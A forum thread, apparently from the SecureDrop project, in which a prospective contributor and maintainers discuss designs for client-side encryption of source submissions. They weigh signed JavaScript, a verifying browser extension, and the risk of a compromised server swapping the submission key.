Prototyping client-side cryptography

I have read Issue #92 thoroughly and would like to get clarified on some things:

  1. We are trying to achieve end-to-end encryption. So, the source’s submissions have to be encrypted with the journalist’s public key. However, at some places, there were some comments stating that the submissions are encrypted to the instance’s public key, for example, this.
    So, is it the journalist’s or the instance’s?

  2. If and only if the browser add-on sees a SecureDrop website and the signature verification is successful, it must enable the JavaScript, and disable otherwise. Is this premise true? And if yes, alerting the sources to turn on the No-Script is unnecessary. Am I right?

  3. Presuming that signing takes place using a symmetric key, which is going to be baked into the extension, are there any chances for an adversary in control of the application server to get access to the key, thus enabling him to alter the JS file to have his public key and making signature verification legit?

  • If yes, signing should have to be done by a developer or the admin, each time when the source server is requested. How is this going to be possible?

  • And if no, how is the key management taking place securely?

@hariharanj4v4 on gitter you mentionned that you did some research on the topic and I’m curious to know more about that. Would you mind summarizing your research for us?

@dachary I would love to. By research, I meant the following:

  1. Completely read and tried to understand the comments of Issue #92. This took most of the time.
  2. Gone through this.
  3. Tried to understand some of existing client-side crypto implementations, like that of MEGA’s.
  4. Had a look at Mailvelope and their client-side model.
  5. Installed this extension, and had a look at its working.

@redshiftzero @emkll I got clarified regarding my 1st and 3rd doubts. Submissions are encrypted using the instance’s public key, every time, irrespective of the journalist, and decryption at the SVS with the instance’s private key. And, asymmetrically signing when uploading the pages would solve the problem, addressed in the 3rd issue. Is my understanding right?

Hi @hariharanj4v4,

Thank you for starting this discussion. Yes, exactly! There is only one submission keypair per SecureDrop instance, and the private key resides on the airgapped SVS.

Indeed, there are several ways to solve this problem, and this is why this is investigative work is needed, to prototype and evaluate which would be best. Another library that could be interesting to look at is the one used by protonmail: https://github.com/openpgpjs/openpgpjs/.

As you mention, signing the client-side code (whether it’s a JavaScript or a maybe a browser extension) to validate integrity and authenticity. SecureDrop rarely relies on a single security control, we use defense-in-depth to ensure complementary security controls are applied. In the case of JavaScript cryptography, we could also use Content Security Policy hash-value for example, to add another mechanism to verify integrity of the code delivered to the browser.

Hi @mickael , thanks for the response. As you quoted,

Indeed, there are several ways to solve this problem, and this is why this is investigative work is needed, to prototype and evaluate which would be best.

Apart from the approach described by @redshiftzero here, there is this easy implementation also possible where:

  1. The current front end isn’t changed, i.e., no JS to perform client crypto is added additionally.
  2. The web pages aren’t signed (The security issues are discussed in a moment).
  3. We implement a browser extension which performs the crypto when uploading and downloading the documents from a SecureDrop website.
  4. Since, we assume that sources turn on the NoScript, we no need to get worried about an attacker controlled web page which could void source anonymity.

There are a few upsides to this:

No need to rely on the JS crypto library security. As you mentioned earlier,

Another library that could be interesting to look at is the one used by protonmail: GitHub - openpgpjs/openpgpjs: OpenPGP implementation for JavaScript.

there are a lot of client-side crypto libraries available and the security of whose could be best analyzed and used, but with this implementation, there simply would be no necessity for JS to run in the client. We also won’t disturb the current functionality of NoScript - disables all the scripts from any site.

However there is this downside too:

Since, we don’t perform signing anywhere, the ability for the client to red flag any malicious activity, such as an integrity verification failure, etc is disabled.

If red flagging isn’t a big concern here, this approach could be a good one to consider and further analyze. What are your opinions? @mickael @redshiftzero

Thanks for your reply!

Indeed, that is true. Technically-proficient sources already know how (or can easily search online) to encrypt files on the command line or use existing software, but the goal of this project is to have end-to-end encryption accessible to all potential sources. Doing it transparently would obviously be the easiest from an end-user perspective. A big portion of this is a UX challenge: we want to deliver a high level of submission confidentiality and source anonymity to all potential sources (whether they are technically proficient in the use of encryption technologies for not)

In this client-side cryptography use-case, the reason reason why we care so much about integrity of code is that it will be running on the user’s machine, and could help fingerprint or de-anonymize a source. All other assets that are served by SecureDrop instances are static, and given the anonymity properties provided by the Tor Browser, should provide strong guarantees for source anonymity.

Of course yes and we will!

This implementation should provide anonymity to all the potential sources, irrespective of their technicality. And, the user experience is never going to fall at all. The browser extension simply sits at the corner and does all the crypto work. The user will never need to interact with the extension at any time. All the user needs to do is just select the documents and when he clicks the upload button, the extension does the encryption and sends them to the source server. Similar in spirit happens the decryption also. Hence, the user experience is never going to change at all.

I understand it very well. Source anonymity is our at most priority. In the implementation that I proposed, even if the attacker modifies the source pages to have a malicious code, since the browser blocks all the scripts using NoScript, there wouldn’t be any possibility for fingerprinting.

Am I right? If not, can you help me understand by giving an example of how this implementation would be a security flaw?

As suggested by @redshiftzero here, even if we build a browser extension the would verify the signature and only executes the JavaScript if the signature verifies, for which we’d need the release key baked into the extension, if a suspicious inspector see the browser extension and tries to reverse engineer it, he’d know that the source is trying to contact a SecureDrop server, thus disabling plausible deniability. Am I correct? @mickael @redshiftzero

Yes, @hariharanj4v4, the presence of a SecureDrop-specific browser extension would definitely remove plausible deniability if it was uncovered by an adversary (Add-ons will persist Tor-Browser sessions, and it is unclear what information will remain at a forensic level). For now, at a high-level there are two solutions that were brought forward in the past:

  • JavaScript served by the SecureDrop instance ( higher traffic fingerprint resistance / deniability, lower integrity of code, only the SD server needs to be compromised), but need to disable noScript.
  • Downloaded browser plugin (lower traffic fingerprint resistance / deniability, higher integrity, as the plugin also needs to be compromised), no need to disable noScript.

Regarding the fingerprinting/de-anonymizing using JavaScript, this is an example. This is why we recommend sources disable JavaScript in TorBrowser.

Thanks for the response @mickael,

I would also like to know what implementation I have to start working on. You already gave your comments for this implementation, for which I have replied here, explaining why this implementation would stand good.

Can you please have a look at my reply, and tell me if that is a secure option to implement? I think that this is a secure implementation because, we don’t require JS to run client-side, hence disabling all potential attacks, at the same time do client-side crypto, without compromising any current UX. If yes, I would start working to propose a detailed timeline of its implementation. If no, I would start working on the idea described here.

Hi @hariharanj4v4 - you make great points regarding a SecureDrop browser extension that does all the crypto operations. I think that could provide both great UX and great security for sources.

To provide deniability for sources, if we were to have a SecureDrop-specific browser extension as you propose, we’d want to get it bundled into Tor Browser. This is possible, but would be a harder sell than a generic browser extension that prevented the execution of unsigned JavaScript (signed by a key in some list of legitimate developers, one of which would be the SecureDrop release key). One could imagine another option on the Tor Browser security slider instead of “Low - execute JavaScript” - “Safer - Execute only signed JavaScript”. So, we suggested this approach because its generic approach has a higher probability of being bundled in Tor Browser, since many projects may find it useful.

An important security question for either implementation worth investigating either in the proposal or during the summer is: what prevents an attacker that compromises the application server from simply replacing the submission key with an attacker-controlled key? Is there any way to mitigate this risk? Could we perhaps make this detectable?

Thanks for the reply @redshiftzero.

This is a great idea for providing plausible deniability as well as getting the extension bundled into Tor Browser. Will surely work on this particular implementation of the browser extension.

Regarding the above question, I don’t get it why its a threat. Let me explain you why. The instance’s public key is going inside the < html > tag, and the JS uses it for the encrypting the documents. The entire content inside this < html > tag, which includes the public key also, is signed by a SecureDrop developer, using a signing key. The browser extension checks the authenticity of the web pages using the corresponding verifying key. So, even if an attacker that compromises the application server, replaces the submission key with one of his own, the signature verification fails and the extension won’t run any code, and the source will not be able to upload any documents at all. Am I correct, or am I missing anything?

And, all these arguments are based on the assumption that the attacker has no access to the developers’ signing key, and is a good assumption for security, because such case is highly unlikely.

Regarding the above question, I don’t get it why its a threat. Let me explain you why. The instance’s public key is going inside the < html > tag, and the JS uses it for the encrypting the documents. The entire content inside this < html > tag, which includes the public key also, is signed by a SecureDrop developer, using a signing key. The browser extension checks the authenticity of the web pages using the corresponding verifying key. So, even if an attacker that compromises the application server, replaces the submission key with one of his own, the signature verification fails and the extension won’t run any code, and the source will not be able to upload any documents at all. Am I correct, or am I missing anything?

Ah - I’m glad you asked this @hariharanj4v4 as it hits on an important constraint. The JavaScript-verifying extension would actually not be signing the submission keys (as currently sketched out at least):

  1. SecureDrop releases and the JS would be signed by the SecureDrop release key.
  2. The submission key that the source encrypts to would be provided by each individual server. These can change independent of SecureDrop releases.

So clearly this is an issue - if we are replacing the problem of an attacker that compromises the application server can snoop on plaintext documents in memory with the problem of an attacker that compromises the application server can snoop on documents encrypted to a key that the attacker controls, then we’re not really making a major improvement. There are several possible solutions to this problem, and no magic bullet, but we’d want the student to explore how one could address this flaw (either with a design change or through some other method).

Thanks a lot for the reply @redshiftzero,

This made my understanding very clear. I see the threat now! Tell me if this would solve the problem:

The media organizations:

  • Provide the public key and email id of the admin, along with the sd onion website, in their securedrop landing page

The developers:

  • Ship JS to encrypt submissions client-side to the instance’s public key.
  • Modify the current installation script to additionally:
    • embed the submission key of the instance inside the JS and HTML files
    • ask the admin for his private key and sign all the source pages with this key
    • embed the signatures in their HTML files

The admins:

  • Follow the server installation procedures, after setting up the submission key, and sign all the source pages along the way.

The sources:

  • Install Tor Browser which comes with a built-in generic browser extension.
  • Configure it to add SecureDrop websites, their admins’ public keys and their email ids.

The generic browser extension:

  • Disables all the scripts from any site, by default, similar to NoScript
  • Checks if the website requested is added to its configuration and if yes, fetches the corresponding public key of the signer (the admin in our case).
  • Strips the signature from the web page, if present, and verifies if the signature is correct with the previously fetched public key.
    • Allows scripts to run, if and only if the web page authentication is successful.
    • Sends an email to the website admin, alerting about a possible intrusion in their server(Application Server, in our case), if the authentication is unsuccessful.

Would this implementation be secure?

Hi folks! I love this thread… though I’m curious, how is this a UX issue? Is the issue that a user is entering the wrong key? It sounds like a technical issue, unless I’m mistaken.

…also, no—I have not read through the full issue on GH. Scrambling to multi-task, and from what I’ve read above, I don’t understand 90% of what’s being discussed, anyway. :smiley: